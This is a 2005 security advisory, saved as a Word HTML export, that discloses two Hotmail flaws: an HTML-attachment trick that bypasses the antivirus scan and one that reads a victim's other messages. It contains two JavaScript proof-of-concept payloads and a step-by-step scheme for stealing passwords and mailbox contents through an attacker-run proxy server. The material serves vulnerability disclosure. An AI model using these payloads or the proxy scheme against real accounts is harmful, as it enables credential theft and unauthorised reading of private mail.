<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=us-ascii">
<meta name=Generator content="Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Wingdings;
panose-1:5 0 0 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
font-size:12.0pt;
font-family:"Times New Roman";}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EstiloCorreo17
{mso-style-type:personal-compose;
font-family:Arial;
color:windowtext;}
@page Section1
{size:595.3pt 841.9pt;
margin:70.85pt 3.0cm 70.85pt 3.0cm;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:806313585;
mso-list-type:hybrid;
mso-list-template-ids:-212031462 1895479346 201981977 201981979 201981967 201981977 201981979 201981967 201981977 201981979;}
@list l0:level1
{mso-level-tab-stop:36.0pt;
mso-level-number-position:left;
text-indent:-18.0pt;
mso-ansi-font-weight:bold;}
@list l1
{mso-list-id:1266041151;
mso-list-type:hybrid;
mso-list-template-ids:1936496974 201981967 201981977 201981979 201981967 201981977 201981979 201981967 201981977 201981979;}
@list l1:level1
{mso-level-tab-stop:36.0pt;
mso-level-number-position:left;
text-indent:-18.0pt;}
@list l2
{mso-list-id:1626353539;
mso-list-type:hybrid;
mso-list-template-ids:-495164942 201981953 201981955 201981957 201981953 201981955 201981957 201981953 201981955 201981957;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:36.0pt;
mso-level-number-position:left;
text-indent:-18.0pt;
font-family:Symbol;}
ol
{margin-bottom:0cm;}
ul
{margin-bottom:0cm;}
-->
</style>
</head>
<body lang=ES link=blue vlink=purple>
<div class=Section1>
<div style='mso-element:para-border-div;border:none;border-bottom:solid windowtext 1.5pt;
padding:0cm 0cm 1.0pt 0cm'>
<p class=MsoNormal style='border:none;padding:0cm'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Also Advisory PDF adjunct .<o:p></o:p></span></font></b></p>
</div>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal align=right style='text-align:right;text-indent:35.4pt'><i><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-style:italic'>26, of April, 2005<o:p></o:p></span></font></i></p>
<p class=MsoNormal align=right style='text-align:right;text-indent:35.4pt'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><b><font size=3 color="#3366ff" face="Times New Roman"><span
lang=EN-GB style='font-size:12.0pt;color:#3366FF;font-weight:bold'>Hotmail
Antivirus Attachment Bypass.<o:p></o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 color="#3366ff" face="Times New Roman"><span
lang=EN-GB style='font-size:12.0pt;color:#3366FF;font-weight:bold'>Hotmail
Cross Site Message Explore.<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:35.4pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:35.4pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:35.4pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Hotmail is one
of the sites who receive more attacks from Hackers, and it’s supposed to
be one of the more secure sites I have seen. But as some people say, you will
never get security at 100%. The risk is every time out there.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Background<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>I was testing
this until I can get some working code, the authorization and validation of the
site is one of the better that I seen on a mailing system, I never heard about vulnerabilities
of hotmail as in others systems, I just have knowledge of two flaws discovered.
One on 1999 is from George Guninski, and the other when the pwdreset function
make its public, every year hotmail is updated, and getting more secure, and it’s
hard to believe that no one have found this before.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-left:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Description<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The flaws are
made when the user seems the attachment, we can execute, code on the user
machine, this could result in information disclosure, and credentials exposure.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Analysis<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><i><font size=3 color="#3366ff"
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;color:#3366FF;
font-style:italic'>Hotmail Antivirus Attachment Bypass.<o:p></o:p></span></font></i></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This is
possible thanks to the way that Hotmail manage HTML attachments, when we send a
file with html content, hotmail will try open it in a pop up windows after
McAfee antivirus check is made, so here we have access to execute some arbitrary
JavaScript code.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The link for
the first attachment usually is like:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><a
href="http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=SessionID&msg=MSGID&start=VAR&len=VAR&mimepart=Number&vscan=scan">http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=SessionID&msg=MSGID&start=VAR&len=VAR&mimepart=Number&vscan=scan</a><o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>If we seen the
next attachment of the file will be the same link but mimepart is the next one number,
so what happen if we ask for the link without the “vscan=scan” at
the end of the line?<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Usually we
could not make this, but if we take our URL with the JavaScript code, and
recreate the URL with the next mimepart, and without the
“vscan=scan”, we can ask for a window.open(Fakedurl); and the
result is that the next attachment is called without the needed to pass the
antivirus test of hotmail.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Risk: High<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This could
result in a serious damage for users.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Proof of Concept<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'>__________________________________________________________________<o:p></o:p></span></font></b></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str1=document.URL;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str2=str1.split("?");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str3=str2[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str4=str3.split("&");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str5=str4[1]+"&"+str4[2]+"&"+str4[3]+"&"+str4[4]+"&mimepart=";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str6=str4[5];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str7=str6.split("=");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str8=str7[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str9=parseInt(str8)+1;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str10=str5+str9;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=FR
style='font-size:10.0pt'>str11="http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str12=str11+str10;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>window.open(str12);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>Hi this is my proof of concept!.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>_______________________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-left:18.0pt'><i><font size=3 color="#3366ff"
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;color:#3366FF;
font-style:italic'>Hotmail Cross Site Message Explore</span></font></i><i><span
lang=EN-GB style='font-style:italic'>.<o:p></o:p></span></i></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='margin-right:2.2pt;text-align:justify;text-indent:
18.0pt'><font size=3 face="Times New Roman"><span lang=EN-GB style='font-size:
12.0pt'>This is possible thanks to the way that Hotmail manage HTML
attachments, when we send a file with html content, hotmail will try open it in
a pop up windows after McAfee antivirus check is made, so here we have access
to execute some arbitrary JavaScript code.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>And plus to
this, hotmail uses the next two functions to pass from one message to another:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Going to
previous message:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>javascript:S('getmsg','','','','','MSGID','','','prev','')<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Going to Next
message:<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>javascript:S('getmsg','','','','','MSGID','','','next','')<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>As we can see,
we only need to pass to the function the actual message ID, and call it, and we
will have next or previous message on screen, without knowledge of the MSGID of
the next or previous message.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify;text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>So if we
include arbitrary JavaScript code on the attachment asking for the next
message, (we can use, hotmail function, or just make our own function for
this), we can get the all the others messages in account.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Risk: High<o:p></o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This could result
in a serious damage for users or/and information disclosure.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;font-weight:
bold'>Proof of Concept<o:p></o:p></span></font></b></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'>__________________________________________________________________<o:p></o:p></span></font></b></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></head><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'><script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str1=document.URL;<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str2=str1.split("?");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str3=str2[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str4=str3.split("&");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str5="http://by17fd.bay17.hotmail.msn.com/cgi-bin/getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid=";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str6=str4[2];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str7=str6.split("=");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str8=str7[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str9="&msgread=&etype=&wo=";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1]<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>window.open(str10);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>hola napa<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>_______________________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Reach<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>Imagine this situation.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>This is a Proof of Concept Situation.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This is just a
test, and an example, more ways could be more dangerous. But I don’t
think on expose them. Also the POC of the application I mention will not be
exposed for security reasons.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>______________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>More than 50% of the users could fall on this.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=1 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>One
user opens an attachment html from one friend.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='margin-left:18.0pt;text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=2 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The
windows opens, and the user only seen that hotmail, with hotmail URL, ask
again just for the password, because the session remember your mail actual
account.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=3 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>At
the background, attach have frames to not change the URL user seems, get
the original URL, and call some application on one server, with the URL as
parameter. <o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='margin-left:18.0pt;text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=4 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This
server asks for the page of hotmail with the URL reconstructed for call
the same message.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=5 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Hotmail
responds the login page but only ask the password.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=6 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Application
on server acting as a proxy replacing the post or get functions to point
to the server application, sending the user, and the password as news
parameters for the application.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=7 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The
server logs in as the user, and continues acting like a proxy, for all
session or until the windows gets closed by user, and logs all information
about the session. Or just send a page with close statement, after the
password has been logged.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Normal users
don’t see the difference, but we already have all information for use the
account of the victim user. Or just the application can spider, the inbox of
them and save them to a database.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span style='font-size:12.0pt'>______________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span
style='font-size:12.0pt;font-weight:bold'>Luis Alberto Cortes Zavala<o:p></o:p></span></font></b></p>
<p class=MsoNormal><i><font size=3 color="#3366ff" face="Times New Roman"><span
lang=EN-GB style='font-size:12.0pt;color:#3366FF;font-style:italic'>Senior
Security Consultant<o:p></o:p></span></font></i></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>luis.cortes@hypersec.co.uk<o:p></o:p></span></font></p>
